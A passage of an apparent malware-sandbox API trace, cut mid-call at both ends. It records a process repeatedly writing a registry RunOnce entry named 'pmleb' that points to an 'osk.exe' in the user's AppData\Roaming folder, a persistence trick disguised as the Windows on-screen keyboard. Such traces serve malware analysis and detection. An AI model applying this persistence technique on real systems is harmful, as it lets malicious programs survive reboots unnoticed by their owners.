lpUsedDefaultChar=0x0) returned 54 [0079.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.881] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.881] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.881] RegCloseKey (hKey=0x280) returned 0x0 [0079.881] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.881] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.881] SetTimer (hWnd=0x20280, nIDEvent=0x2057, uElapse=0xa, lpTimerFunc=0x0) returned 0x2057 [0079.881] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.893] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.893] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.893] KillTimer (hWnd=0x20280, uIDEvent=0x2057) returned 1 [0079.893] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.893] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.894] IUnknown:Release (This=0x787518) returned 0x1 [0079.894] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.894] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.894] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.894] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.894] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.894] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.894] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.894] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.894] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.894] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x58 [0079.894] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.894] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x59 [0079.894] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.895] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x58 [0079.895] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.895] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.895] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.895] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.896] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.896] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.896] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.896] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.896] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.896] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.896] RegCloseKey (hKey=0x280) returned 0x0 [0079.896] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.896] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.896] SetTimer (hWnd=0x20280, nIDEvent=0x2058, uElapse=0xa, lpTimerFunc=0x0) returned 0x2058 [0079.897] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.909] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.909] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.909] KillTimer (hWnd=0x20280, uIDEvent=0x2058) returned 1 [0079.909] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.909] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.909] IUnknown:Release (This=0x787518) returned 0x1 [0079.909] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.909] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.909] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.910] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.910] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x59 [0079.910] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.910] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5a [0079.910] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.911] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x59 [0079.911] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.911] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.911] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.911] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.911] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.911] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.911] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.912] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.912] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.912] RegCloseKey (hKey=0x280) returned 0x0 [0079.912] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.912] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.912] SetTimer (hWnd=0x20280, nIDEvent=0x2059, uElapse=0xa, lpTimerFunc=0x0) returned 0x2059 [0079.912] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.924] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.924] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.925] KillTimer (hWnd=0x20280, uIDEvent=0x2059) returned 1 [0079.925] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.925] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.925] IUnknown:Release (This=0x787518) returned 0x1 [0079.925] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.925] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.925] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.925] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.926] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.926] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.926] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.926] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.926] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.926] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5a [0079.926] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.926] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5b [0079.926] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.927] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5a [0079.927] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.927] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.927] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.927] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.927] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.927] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.927] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.927] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, 